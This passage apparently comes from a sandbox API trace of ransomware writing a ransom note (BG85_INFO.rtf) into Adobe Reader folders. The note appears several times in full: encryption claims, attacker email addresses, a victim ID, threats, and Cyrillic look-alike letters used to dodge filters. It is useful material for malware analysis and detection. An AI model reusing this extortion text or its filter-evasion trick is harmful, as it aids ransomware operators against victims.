p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2867358, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n…:ºbü…~¯½h\x02×B\x16to@ÀNBåÏ\x07\\\x17ò»\x1c¦\x15¾y³¢H1\x13\x0fSopwu=\x08,}\x1f\n", lpUsedDefaultChar=0x0) returned 7247 [0070.992] WriteFile (in: hFile=0x1bc, lpBuffer=0x2867358*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2867358*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0070.994] CloseHandle (hObject=0x1bc) returned 1 [0070.994] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CHT\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\cht\\bg85_info.rtf")) returned 0xffffffff [0070.994] GetLastError () returned 0x2 [0070.994] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CHT\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\cht\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0070.995] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0070.995] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 